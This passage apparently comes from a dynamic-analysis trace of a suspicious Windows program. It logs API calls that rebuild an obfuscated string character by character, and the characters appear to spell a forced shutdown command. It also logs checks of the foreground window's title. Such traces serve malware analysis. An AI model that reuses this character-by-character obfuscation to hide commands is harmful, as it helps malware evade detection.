pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.456] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.456] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.456] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.457] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.457] GetForegroundWindow () returned 0x20086 [0179.457] GetLastError () returned 0x0 [0179.457] SysStringLen (param_1=" ") returned 0xff [0179.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.457] SysStringLen (param_1=" ") returned 0xff [0179.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.458] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.458] GetLastError () returned 0x0 [0179.458] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.458] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.459] SysStringLen (param_1="Prog") returned 0x4 [0179.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0179.459] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0179.460] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0179.460] GetFocus () returned 0x0 [0179.460] lstrlenA (lpString="Prog") returned 4 [0179.460] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0179.460] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Prog") returned 4 [0179.460] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0179.460] GetFocus () returned 0x0 [0179.463] lstrcmpA (lpString1="Prog", lpString2="Prog") returned 0 [0179.463] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.463] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0179.463] GetFocus () returned 0x0 [0179.463] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0179.464] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0179.464] GetFocus () returned 0x0 [0179.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0179.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0179.464] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.464] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.465] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0179.465] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.466] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0179.466] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.467] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0179.467] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.468] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.468] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.469] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.469] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.469] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.470] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.470] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.471] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.471] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.471] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.472] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.472] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.473] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.473] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.474] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.474] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.475] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.475] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.475] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.476] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.476] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.477] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.477] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.478] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.479] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.479] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.480] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.480] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.481] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.481] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.482] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.482] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.482] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.483] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.483] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.484] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.484] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.484] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.485] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.485] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.485] GetForegroundWindow () returned 0x20086 [0179.485] GetLastError () returned 0x0 [0179.486] SysStringLen (param_1=" ") returned 0xff [0179.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.486] SysStringLen (param_1=" ") returned 0xff [0179.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.486] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.486] GetLastError () returned 0x0 [0179.486] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.486] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.487] SysStringLen (param_1="Pro") returned 0x3 [0179.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0179.487] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0179.487] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0179.487] GetFocus () returned 0x0 [0179.488] lstrlenA (lpString="Pro") returned 3 [0179.488] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0179.488] IsWindow (hWnd=0x103c4) returned 1 [0179.488] IsWindow (hWnd=0x103c4) returned 1 [0179.488] IsWindow (hWnd=0x103c4) returned 1 [0179.488] IsWindow (hWnd=0x103c4) returned 1 [0179.489] GetFocus () returned 0x0 [0179.489] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0179.489] GetFocus () returned 0x0 [0179.489] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0179.489] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0179.489] GetFocus () returned 0x0 [0179.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0179.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0179.490] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.490] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.491] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.491] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 